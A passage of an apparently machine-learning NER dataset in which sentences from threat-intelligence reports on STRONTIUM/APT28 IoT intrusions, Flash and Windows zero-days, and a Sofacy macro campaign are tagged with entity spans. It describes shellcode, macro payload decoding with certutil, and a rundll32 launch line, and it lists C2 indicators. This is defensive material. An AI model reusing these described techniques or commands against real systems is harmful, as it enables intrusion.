[{"start": 63, "end": 66, "label": "System"}]} {"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight .", "spans": [{"start": 0, "end": 3, "label": "System"}]} {"text": "Such devices still must be identifiable , maintained , and monitored by security teams , especially in large complex enterprises .", "spans": []} {"text": "Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": [{"start": 5, "end": 8, "label": "System"}]} {"text": "In most cases however , the customers \u2019 IT operation center don\u2019t know they exist on the network .", "spans": []} {"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 72, "end": 86, "label": "Organization"}]} {"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": [{"start": 83, "end": 86, "label": "System"}]} {"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 52, "end": 55, "label": "System"}]} {"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": []} {"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called \u201c VPN Filter \u201d malware .", "spans": [{"start": 139, "end": 149, "label": "Malware"}]} {"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": [{"start": 4, 
"end": 7, "label": "Organization"}]} {"text": "There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang .", "spans": [{"start": 118, "end": 131, "label": "Organization"}]} {"text": "Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working .", "spans": [{"start": 150, "end": 155, "label": "Organization"}]} {"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": [{"start": 39, "end": 48, "label": "Organization"}, {"start": 49, "end": 75, "label": "Organization"}]} {"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": [{"start": 71, "end": 74, "label": "System"}, {"start": 87, "end": 97, "label": "System"}, {"start": 103, "end": 117, "label": "System"}, {"start": 126, "end": 139, "label": "System"}]} {"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": []} {"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer \u2019s passwords and in the third instance the latest security update had not been applied to the device .", "spans": []} {"text": "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access .", "spans": []} {"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search 
of higher-privileged accounts that would grant access to higher-value data .", "spans": []} {"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": [{"start": 36, "end": 39, "label": "System"}]} {"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": []} {"text": "As the actor moved from one device to another , they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting .", "spans": []} {"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": [{"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 112, "label": "System"}]} {"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": [{"start": 75, "end": 94, "label": "System"}, {"start": 97, "end": 99, "label": "System"}]} {"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]} {"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 125, "end": 134, "label": "Organization"}]} {"text": "Since we identified these attacks in the early stages , we have not been able to conclusively determine what STRONTIUM \u2019s ultimate objectives were in these intrusions .", "spans": [{"start": 109, "end": 118, "label": "Organization"}]} {"text": "Over the last 
twelve months , Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM .", "spans": [{"start": 30, "end": 39, "label": "Organization"}, {"start": 143, "end": 152, "label": "Organization"}]} {"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": [{"start": 29, "end": 38, "label": "Organization"}]} {"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": [{"start": 21, "end": 30, "label": "Organization"}]} {"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": [{"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}]} {"text": "The \u201c VPN Filter \u201d malware has also been attributed to STRONTIUM by the FBI .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 72, "end": 75, "label": "Organization"}]} {"text": "Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices , particularly the ability to monitor IoT device telemetry within enterprise networks .", "spans": [{"start": 141, "end": 144, "label": "System"}, {"start": 191, "end": 194, "label": "System"}]} {"text": "Today , the number of deployed IoT devices outnumber the population of personal computers and mobile phones , combined .", "spans": [{"start": 31, "end": 34, "label": "System"}, {"start": 80, "end": 89, "label": "System"}, {"start": 94, "end": 107, "label": "System"}]} {"text": "With each networked IoT device having its own 
separate network stack , it \u2019s quite easy to see the need for better enterprise management , especially in today \u2019s \u201c bring your own device \u201d world .", "spans": [{"start": 20, "end": 23, "label": "System"}]} {"text": "While much of the industry focuses on the threats of hardware implants , we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives .", "spans": []} {"text": "These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments .", "spans": [{"start": 93, "end": 96, "label": "System"}]} {"text": "Upon conclusion of our investigation , we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products .", "spans": []} {"text": "However , there is a need for broader focus across IoT in general , both from security teams at organizations that need to be more aware of these types of threats , as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks .", "spans": [{"start": 51, "end": 54, "label": "System"}, {"start": 181, "end": 184, "label": "System"}]} {"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": [{"start": 33, "end": 42, "label": "Organization"}, {"start": 77, "end": 86, "label": "Organization"}]} {"text": "Command-and-Control ( C2 ) IP addresses :", "spans": [{"start": 0, "end": 19, "label": "System"}, {"start": 22, "end": 24, "label": "System"}]} {"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, 
{"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]} {"text": "Operation RussianDoll : Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia \u2019s APT28 in Highly-Targeted Attack .", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 40, "end": 48, "label": "Vulnerability"}, {"start": 88, "end": 93, "label": "Organization"}]} {"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 65, "end": 73, "label": "Vulnerability"}, {"start": 93, "end": 104, "label": "System"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 138, "end": 145, "label": "System"}]} {"text": "Using the Dynamic Threat Intelligence Cloud ( DTI ) , FireEye researchers detected a pattern of attacks beginning on April 13th , 2015 .", "spans": [{"start": 10, "end": 43, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 54, "end": 61, "label": "Organization"}]} {"text": "Adobe independently patched the vulnerability ( CVE-2015-3043 ) in APSB15-06 .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 48, "end": 61, "label": "Vulnerability"}]} {"text": "Through correlation of technical indicators and command and control infrastructure , FireEye assess that APT28 is probably responsible for this activity .", "spans": [{"start": 48, "end": 67, "label": "System"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 105, "end": 110, "label": "Organization"}]} {"text": "Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows ( CVE-2015-1701 ) .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 82, "end": 89, "label": "System"}, {"start": 92, "end": 105, "label": "Vulnerability"}]} {"text": "While there is not yet a 
patch available for the Windows vulnerability , updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous .", "spans": [{"start": 49, "end": 56, "label": "System"}, {"start": 82, "end": 93, "label": "System"}]} {"text": "We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043 .", "spans": [{"start": 18, "end": 31, "label": "Vulnerability"}, {"start": 63, "end": 74, "label": "System"}, {"start": 87, "end": 100, "label": "Vulnerability"}]} {"text": "The Microsoft Security Team is working on a fix for CVE-2015-1701 .", "spans": [{"start": 4, "end": 27, "label": "Organization"}, {"start": 52, "end": 65, "label": "Vulnerability"}]} {"text": "The high level flow of the exploit is as follows :", "spans": []} {"text": "User clicks link to attacker controlled website .", "spans": []} {"text": "HTML/JS launcher page serves Flash exploit .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 29, "end": 34, "label": "System"}]} {"text": "Flash exploit triggers CVE-2015-3043 , executes shellcode .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 48, "end": 57, "label": "System"}]} {"text": "Shellcode downloads and runs executable payload .", "spans": [{"start": 0, "end": 9, "label": "System"}]} {"text": "Executable payload exploits local privilege escalation ( CVE-2015-1701 ) to steal System token .", "spans": [{"start": 57, "end": 70, "label": "Vulnerability"}]} {"text": "The Flash exploit is served from unobfuscated HTML/JS .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 46, "end": 53, "label": "System"}]} {"text": "The launcher page picks one of two Flash files to deliver depending upon the target \u2019s platform ( Windows 32 versus 64bits ) .", "spans": [{"start": 35, "end": 40, "label": "System"}, {"start": 98, "end": 108, "label": "System"}]} {"text": "The Flash exploit is mostly unobfuscated with 
only some light variable name mangling .", "spans": [{"start": 4, "end": 9, "label": "System"}]} {"text": "The attackers relied heavily on the CVE-2014-0515 Metasploit module , which is well documented .", "spans": [{"start": 36, "end": 49, "label": "Vulnerability"}, {"start": 50, "end": 60, "label": "System"}]} {"text": "It is ROPless , and instead constructs a fake vtable for a FileReference object that is modified for each call to a Windows API .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 124, "end": 127, "label": "System"}]} {"text": "The payload exploits a local privilege escalation vulnerability in the Windows kernel if it detects that it is running with limited privileges .", "spans": [{"start": 71, "end": 78, "label": "System"}]} {"text": "It uses the vulnerability to run code from userspace in the context of the kernel , which modifies the attacker \u2019s process token to have the same privileges as that of the System process .", "spans": []} {"text": "The primary difference between the CVE-2014-0515 metasploit module and this exploit is , obviously , the vulnerability .", "spans": [{"start": 35, "end": 48, "label": "Vulnerability"}]} {"text": "CVE-2014-0515 exploits a vulnerability in Flash \u2019s Shader processing , whereas CVE-2015-3043 exploits a vulnerability in Flash \u2019s FLV processing .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 42, "end": 47, "label": "System"}, {"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 121, "end": 126, "label": "System"}, {"start": 130, "end": 133, "label": "System"}]} {"text": "The culprit FLV file is embedded within AS3 in two chunks , and is reassembled at runtime .", "spans": [{"start": 12, "end": 15, "label": "System"}]} {"text": "A buffer overflow vulnerability exists in Adobe Flash Player ( <=17.0.0.134 ) when parsing malformed FLV objects .", "spans": [{"start": 42, "end": 60, "label": "System"}, 
{"start": 101, "end": 104, "label": "System"}]} {"text": "Attackers exploiting the vulnerability can corrupt memory and gain remote code execution .", "spans": []} {"text": "In the exploit , the attacker embeds the FLV object directly in the ActionScript code , and plays the video using NetStream class .", "spans": [{"start": 41, "end": 44, "label": "System"}, {"start": 68, "end": 80, "label": "System"}]} {"text": "Files of the FLV file format contain a sequence of Tag structures .", "spans": [{"start": 13, "end": 16, "label": "System"}]} {"text": "Beginning within the data field , all contents of the FLV stream become 0xEE .", "spans": [{"start": 54, "end": 57, "label": "System"}]} {"text": "Consequently , the data and lastsize fields are mangled .", "spans": []} {"text": "Since the size is controlled by the attacker , it \u2019s possible to overflow the fixed size buffer with certain data .", "spans": []} {"text": "As the previous picture demonstrated , the followed Vector object \u2019s length field being overflowed as 0x80007fff , which enables the attacker to read/write arbitrary data within user space .", "spans": []} {"text": "Shellcode is passed to the exploit from HTML in flashvars .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 40, "end": 44, "label": "System"}]} {"text": "The shellcode downloads the next stage payload , which is an executable passed in plaintext , to the temp directory with UrlDownloadToFileA , which it then runs with WinExec .", "spans": [{"start": 4, "end": 13, "label": "System"}]} {"text": "This exploit delivers a malware variant that shares characteristics with the APT28 backdoors CHOPSTICK and CORESHELL malware families , both described in our APT28 whitepaper .", "spans": [{"start": 77, "end": 82, "label": "Organization"}, {"start": 93, "end": 102, "label": "Malware"}, {"start": 107, "end": 116, "label": "Malware"}, {"start": 158, "end": 163, "label": "Organization"}]} {"text": "The malware uses an RC4 encryption 
key that was previously used by the CHOPSTICK backdoor .", "spans": [{"start": 71, "end": 89, "label": "Malware"}]} {"text": "And the C2 messages include a checksum algorithm that resembles those used in CHOPSTICK backdoor communications .", "spans": [{"start": 8, "end": 10, "label": "System"}, {"start": 78, "end": 96, "label": "Malware"}]} {"text": "In addition , the network beacon traffic for the new malware resembles those used by the CORESHELL backdoor .", "spans": [{"start": 89, "end": 107, "label": "Malware"}]} {"text": "Like CORESHELL , one of the beacons includes a process listing from the victim host .", "spans": [{"start": 5, "end": 14, "label": "Malware"}]} {"text": "And like CORESHELL , the new malware attempts to download a second-stage executable .", "spans": [{"start": 9, "end": 18, "label": "Malware"}]} {"text": "One of the C2 locations for the new payload , 87.236.215.246 , also hosts a suspected APT28 domain ssl-icloud.com .", "spans": [{"start": 11, "end": 13, "label": "System"}, {"start": 46, "end": 60, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 99, "end": 113, "label": "Indicator"}]} {"text": "The same subnet ( 87.236.215.0 / 24 ) also hosts several known or suspected APT28 domains .", "spans": [{"start": 18, "end": 30, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Organization"}]} {"text": "The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows .", "spans": [{"start": 91, "end": 104, "label": "Vulnerability"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 118, "end": 125, "label": "System"}]} {"text": "The exploit uses CVE-2015-1701 to execute a callback in userspace .", "spans": [{"start": 17, "end": 30, "label": "Vulnerability"}]} {"text": "The callback gets the EPROCESS structures of the current process and the System process , and copies data from the System token into the token of the current process 
.", "spans": [{"start": 22, "end": 30, "label": "System"}]} {"text": "Upon completion , the payload continues execution in usermode with the privileges of the System process .", "spans": []} {"text": "Because CVE-2015-3043 is already patched , this remote exploit will not succeed on a fully patched system .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}]} {"text": "If an attacker wanted to exploit CVE-2015-1701 , they would first have to be executing code on the victim \u2019s machine .", "spans": [{"start": 33, "end": 46, "label": "Vulnerability"}]} {"text": "Barring authorized access to the victim \u2019s machine , the attacker would have to find some other means , such as crafting a new Flash exploit , to deliver a CVE-2015-1701 payload .", "spans": [{"start": 127, "end": 132, "label": "System"}, {"start": 156, "end": 169, "label": "Vulnerability"}]} {"text": "Microsoft is aware of CVE-2015-1701 and is working on a fix .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 22, "end": 35, "label": "Vulnerability"}]} {"text": "CVE-2015-1701 does not affect Windows 8 and later .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 30, "end": 39, "label": "System"}]} {"text": "Sofacy Attacks Multiple Government Entities .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "Release_Time : 2018-02-28", "spans": []} {"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/", "spans": []} {"text": "The Sofacy group ( AKA APT28 , Fancy Bear , STRONTIUM , Sednit , Tsar Team , Pawn Storm ) is a well-known adversary that remains highly active in the new calendar year of 2018 .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 44, "end": 53, "label": "Organization"}, {"start": 56, "end": 62, "label": "Organization"}, {"start": 
65, "end": 74, "label": "Organization"}, {"start": 77, "end": 87, "label": "Organization"}]} {"text": "Unit 42 actively monitors this group due to their persistent nature globally across all industry verticals .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Recently , we discovered a campaign launched at various Ministries of Foreign Affairs around the world .", "spans": [{"start": 56, "end": 85, "label": "Organization"}]} {"text": "Interestingly , there appear to be two parallel efforts within the campaign , with each effort using a completely different toolset for the attacks .", "spans": []} {"text": "In this blog , we will discuss one of the efforts which leveraged tools that have been known to be associated with the Sofacy group .", "spans": [{"start": 119, "end": 125, "label": "Organization"}]} {"text": "At the beginning of February 2018 , we discovered an attack targeting two government institutions related to foreign affairs .", "spans": []} {"text": "These entities are not regionally congruent , and the only shared victimology involves their organizational functions .", "spans": []} {"text": "Specifically , one organization is geographically located in Europe and the other in North America .", "spans": []} {"text": "The initial attack vector leveraged a phishing email , using the subject line of Upcoming Defense events February 2018 and a sender address claiming to be from Jane \u2019s 360 defense events events@ihsmarkit.com .", "spans": [{"start": 81, "end": 97, "label": "Organization"}, {"start": 168, "end": 171, "label": "Organization"}, {"start": 187, "end": 207, "label": "Indicator"}]} {"text": "Jane \u2019s by IHSMarkit is a well-known supplier of information and analysis often times associated with the defense and government sector .", "spans": [{"start": 11, "end": 20, "label": "Organization"}]} {"text": "Analysis of the email header data showed that the sender address was spoofed and did not originate from IHSMarkit at 
all .", "spans": [{"start": 16, "end": 21, "label": "System"}, {"start": 104, "end": 113, "label": "Organization"}]} {"text": "The lure text in the phishing email claims the attachment is a calendar of events relevant to the targeted organizations and contained specific instructions regarding the actions the victim would have to take if they had \u201c trouble viewing the document \u201d .", "spans": []} {"text": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 38, "end": 43, "label": "System"}, {"start": 44, "end": 47, "label": "System"}, {"start": 81, "end": 86, "label": "System"}]} {"text": "The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros .", "spans": [{"start": 43, "end": 48, "label": "System"}, {"start": 114, "end": 120, "label": "System"}]} {"text": "Notably , all of the content text is accessible to the victim even before macros are enabled .", "spans": [{"start": 74, "end": 80, "label": "System"}]} {"text": "However , a white font color is applied to the text to make it appear that the victim must enable macros to access the content .", "spans": []} {"text": "The code above changes the font color to black within the specified cell range and presents the content to the user .", "spans": []} {"text": "On initial inspection , the content appears to be the expected legitimate content , however , closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document .", "spans": []} {"text": "Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs .", "spans": [{"start": 115, "end": 120, "label": "System"}]} {"text": "As mentioned in a recent ISC diary entry , the macro gets the contents of cells in column 170 in rows 2227 to 2248 to obtain the base64 encoded 
payload .", "spans": [{"start": 25, "end": 28, "label": "System"}, {"start": 47, "end": 52, "label": "System"}]} {"text": "The macro prepends the string \u2014\u2013BEGIN CERTIFICATE\u2014\u2013 to the beginning of the base64 encoded payload and appends \u2014\u2013END CERTIFICATE\u2014\u2013 to the end of the data .", "spans": [{"start": 4, "end": 9, "label": "System"}]} {"text": "The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 109, "end": 113, "label": "Indicator"}]} {"text": "The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 154, "end": 158, "label": "Indicator"}]} {"text": "The macro sleeps for two seconds and then executes the newly dropped executable .", "spans": [{"start": 4, "end": 9, "label": "System"}]} {"text": "The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack .", "spans": [{"start": 41, "end": 47, "label": "Vulnerability"}]} {"text": "We performed a more detailed analysis on this loader Trojan , which readers can view in this report \u2019s appendix .", "spans": [{"start": 53, "end": 59, "label": "Vulnerability"}]} {"text": "Upon execution , the loader will decrypt the embedded payload ( DLL ) using a custom algorithm , decompress it and save it to the following file : %LOCALAPPDATA%\\cdnver.dll .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 147, "end": 172, "label": "Indicator"}]} {"text": "The loader will then create the batch file %LOCALAPPDATA%\\cdnver.bat , which it will write the following :", "spans": [{"start": 43, "end": 68, "label": "Indicator"}]} {"text": "start rundll32.exe \u201c 
C:\\Users\\user\\AppData\\Local\\cdnver.dll \u201d .", "spans": [{"start": 6, "end": 18, "label": "Indicator"}, {"start": 21, "end": 59, "label": "Indicator"}]} {"text": "The loader Trojan uses this batch file to run the embedded DLL payload .", "spans": [{"start": 11, "end": 17, "label": "Vulnerability"}, {"start": 59, "end": 62, "label": "System"}]} {"text": "For persistence , the loader will write the path to this batch file to the following registry key .", "spans": []} {"text": "The cdnver.dll payload installed by the loader executable is a variant of the SofacyCarberp payload , which is used extensively by the Sofacy threat group .", "spans": [{"start": 4, "end": 14, "label": "Indicator"}, {"start": 78, "end": 91, "label": "Malware"}, {"start": 135, "end": 141, "label": "Organization"}]} {"text": "Overall , SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system .", "spans": [{"start": 10, "end": 23, "label": "Malware"}, {"start": 106, "end": 108, "label": "System"}]} {"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify.net .", "spans": [{"start": 16, "end": 29, "label": "Malware"}, {"start": 80, "end": 82, "label": "System"}, {"start": 92, "end": 105, "label": "Indicator"}]} {"text": "The loader and the SofacyCarberp sample delivered in this attack is similar to samples we have analyzed in the past but contains marked differences .", "spans": [{"start": 19, "end": 32, "label": "Malware"}]} {"text": "These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection , as well as changes to the C2 communication mechanisms .", "spans": [{"start": 61, "end": 64, "label": "System"}, {"start": 155, "end": 157, "label": "System"}]} {"text": "It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery 
document and/or the macro used in this attack .", "spans": [{"start": 16, "end": 22, "label": "Organization"}, {"start": 64, "end": 75, "label": "System"}, {"start": 121, "end": 126, "label": "System"}]} {"text": "Luckystrike , which was presented at DerbyCon 6 in September 2016 , is a Microsoft PowerShell based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 83, "end": 93, "label": "System"}, {"start": 177, "end": 182, "label": "System"}, {"start": 189, "end": 194, "label": "System"}, {"start": 198, "end": 202, "label": "System"}]} {"text": "We believe Sofacy used this tool , as the macro within their delivery document closely resembles the macros found within Luckystrike .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 42, "end": 47, "label": "System"}, {"start": 121, "end": 132, "label": "System"}]} {"text": "To confirm our suspicions , we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy \u2019s delivery document .", "spans": [{"start": 53, "end": 58, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 98, "end": 103, "label": "System"}, {"start": 111, "end": 116, "label": "System"}, {"start": 130, "end": 136, "label": "Organization"}]} {"text": "We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload .", "spans": [{"start": 128, "end": 139, "label": "System"}]} {"text": "The one non-random string difference was the path to the \u201c .txt \u201d and \u201c .exe \u201d files within the command \u201c certutil -decode \u201d , as the Sofacy document used \u201c 
C:\\Programdata\\ \u201d for the path whereas the Luckystrike document used the path stored in the Application.UserLibraryPath environment variable .", "spans": [{"start": 59, "end": 63, "label": "Indicator"}, {"start": 72, "end": 76, "label": "Indicator"}, {"start": 134, "end": 140, "label": "Organization"}, {"start": 200, "end": 211, "label": "System"}, {"start": 249, "end": 276, "label": "Indicator"}]} {"text": "Figure 3 below shows a diff with the LuckyStrike macro on the left and Sofacy macro on the right , where everything except the file path and randomly generated values in the macro are exactly the same , including the obfuscation attempts that use concatenation to build strings .", "spans": [{"start": 37, "end": 48, "label": "System"}, {"start": 49, "end": 54, "label": "System"}, {"start": 71, "end": 77, "label": "Organization"}, {"start": 78, "end": 83, "label": "System"}, {"start": 174, "end": 179, "label": "System"}]} {"text": "With much of our research , our initial direction and discovery of emerging threats is generally some combination of previously observed behavioral rulesets or relationships .", "spans": []} {"text": "In this case , we had observed a strange pattern emerging from the Sofacy group over the past year within their command and control infrastructure .", "spans": [{"start": 67, "end": 73, "label": "Organization"}, {"start": 112, "end": 131, "label": "System"}]} {"text": "Patterning such as reuse of WHOIS artifacts , IP reuse , or even domain name themes are common and regularly used to group attacks to specific campaigns .", "spans": [{"start": 28, "end": 33, "label": "System"}]} {"text": "In this case , we had observed the Sofacy group registering new domains , then placing a default landing page which they then used repeatedly over the course of the year .", "spans": [{"start": 35, "end": 41, "label": "Organization"}]} {"text": "No other parts of the C2 infrastructure amongst these domains contained any overlapping artifacts .", 
"spans": [{"start": 22, "end": 24, "label": "System"}]} {"text": "Instead , the actual content within the body of the websites was an exact match in each instance .", "spans": []} {"text": "Specifically , the strings 866-593-54352 ( notice it is one digit too long ) , 403-965-2341 , or the address 522 Clematis .", "spans": []} {"text": "Suite 3000 was repeatedly found in each instance .", "spans": []} {"text": "ThreatConnect had made the same observation regarding this patterning in September 2017 .", "spans": [{"start": 0, "end": 13, "label": "System"}]} {"text": "Hotfixmsupload.com is particularly interesting as it has been identified as a Sofacy C2 domain repeatedly , and was also brought forth by Microsoft in a legal complaint against STRONTIUM ( Sofacy ) as documented here .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 78, "end": 84, "label": "Organization"}, {"start": 85, "end": 87, "label": "System"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 189, "end": 195, "label": "Organization"}]} {"text": "Leveraging this intelligence allowed us to begin predicting potential C2 domains that would eventually be used by the Sofacy group .", "spans": [{"start": 70, "end": 72, "label": "System"}, {"start": 118, "end": 124, "label": "Organization"}]} {"text": "In this scenario , the domain cdnverify.net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": [{"start": 152, "end": 154, "label": "System"}]} {"text": "The Sofacy group should no longer be an unfamiliar threat at this stage .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]} {"text": "They have been well documented and well researched with much of their attack methodologies exposed .", "spans": []} {"text": "They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past .", "spans": []} 
{"text": "This leads us to believe that their attack attempts are likely still succeeding , even with the wealth of threat intelligence available in the public domain .", "spans": []} {"text": "Application of the data remains challenging , and so to continue our initiative of establishing playbooks for adversary groups , we have added this attack campaign as the next playbook in our dataset .", "spans": []} {"text": "Palo Alto Networks customers are protected from this threat by :", "spans": [{"start": 0, "end": 18, "label": "Organization"}]} {"text": "WildFire detects all SofacyCarberp payloads with malicious verdicts .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 21, "end": 34, "label": "Malware"}]} {"text": "AutoFocus customers can track these tools with the Sofacy , SofacyMacro and SofacyCarberp .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 51, "end": 57, "label": "Organization"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 76, "end": 89, "label": "Malware"}]} {"text": "Traps blocks the Sofacy delivery documents and the SofacyCarberp payload .", "spans": [{"start": 17, "end": 23, "label": "Organization"}, {"start": 51, "end": 64, "label": "Malware"}]} {"text": "SHA256 : ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8 SHA256 : 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8 SHA256 : cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 SHA256 : 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701 Sofacy : Cdnverify.net Sofacy Filename : Upcoming_Events_February_2018.xls .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}, {"start": 83, "end": 147, "label": "Indicator"}, {"start": 157, "end": 221, "label": "Indicator"}, {"start": 231, "end": 295, "label": "Indicator"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 305, "end": 318, "label": "Indicator"}, {"start": 319, "end": 325, "label": "Organization"}, {"start": 
